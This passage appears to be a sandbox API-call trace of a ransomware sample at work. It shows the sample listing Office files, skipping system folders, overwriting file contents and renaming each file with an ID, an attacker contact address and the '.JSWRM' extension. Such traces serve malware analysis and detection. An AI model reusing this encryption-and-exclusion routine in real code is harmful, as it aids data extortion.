hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0115.074] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ba9874, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ba9874, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSPUB_COL.HXT", cAlternateFileName="MSPUB_~1.HXT")) returned 1 [0115.074] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2=".") returned 1 [0115.074] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2="..") returned 1 [0115.075] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2="...") returned 1 [0115.075] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2="windows") returned -1 [0115.075] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2="recovery") returned -1 [0115.075] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2="perflogs") returned -1 [0115.075] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2="documents and settings") returned 1 [0115.075] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0115.075] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2="system volume information") returned -1 [0115.075] lstrcmpiW (lpString1="MSPUB_COL.HXT", lpString2="msocache") returned 1 [0115.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0115.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0115.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0115.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0115.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0115.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0115.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0115.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0115.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0115.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.076] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=205) returned 1 [0115.076] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0115.076] ReadFile (in: hFile=0x238, lpBuffer=0x24bce0, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24bce0*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0115.077] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.077] WriteFile (in: hFile=0x238, lpBuffer=0x24bce0*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24bce0*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0115.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0115.077] CloseHandle (hObject=0x238) returned 1 [0115.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0115.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0115.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0115.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0115.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0115.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0115.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0115.078] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0115.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0115.079] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ba9874, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ba9874, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSPUB_F_COL.HXK", cAlternateFileName="MSPUB_~2.HXK")) returned 1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2=".") returned 1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2="..") returned 1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2="...") returned 1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2="windows") returned -1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2="recovery") returned -1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2="perflogs") returned -1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2="documents and settings") returned 1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2="system volume information") returned -1 [0115.079] lstrcmpiW (lpString1="MSPUB_F_COL.HXK", lpString2="msocache") returned 1 [0115.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0115.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0115.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0115.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0115.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0115.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0115.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0115.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0115.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0115.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.080] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0115.080] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0115.080] ReadFile (in: hFile=0x238, lpBuffer=0x2093c8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0115.081] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.081] WriteFile (in: hFile=0x238, lpBuffer=0x2093c8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0115.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0115.081] CloseHandle (hObject=0x238) returned 1 [0115.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0115.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0115.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0115.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0115.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0115.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0115.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0115.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0115.082] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0115.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0115.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0115.082] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ba9874, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ba9874, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSPUB_K_COL.HXK", cAlternateFileName="MSPUB_~1.HXK")) returned 1 [0115.082] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2=".") returned 1 [0115.083] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2="..") returned 1 [0115.083] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2="...") returned 1 [0115.083] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2="windows") returned -1 [0115.083] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2="recovery") returned -1 [0115.083] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2="perflogs") returned -1 [0115.083] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2="documents and settings") returned 1 [0115.083] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0115.083] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2="system volume information") returned -1 [0115.083] lstrcmpiW (lpString1="MSPUB_K_COL.HXK", lpString2="msocache") returned 1 [0115.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0115.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0115.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0115.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0115.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0115.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0115.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0115.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0115.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0115.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.084] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0115.084] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0115.084] ReadFile (in: hFile=0x238, lpBuffer=0x209170, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209170*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0115.085] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.085] WriteFile (in: hFile=0x238, lpBuffer=0x209170*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209170*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0115.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0115.085] CloseHandle (hObject=0x238) returned 1 [0115.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0115.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0115.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0115.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0115.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0115.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0115.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0115.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0115.085] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0115.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0115.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0115.086] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ba9874, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ba9874, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d682, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSQRY32.CHM", cAlternateFileName="")) returned 1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2=".") returned 1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2="..") returned 1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2="...") returned 1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2="windows") returned -1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2="recovery") returned -1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2="perflogs") returned -1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2="documents and settings") returned 1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2="$RECYCLE.BIN") returned 1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2="system volume information") returned -1 [0115.086] lstrcmpiW (lpString1="MSQRY32.CHM", lpString2="msocache") returned 1 [0115.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 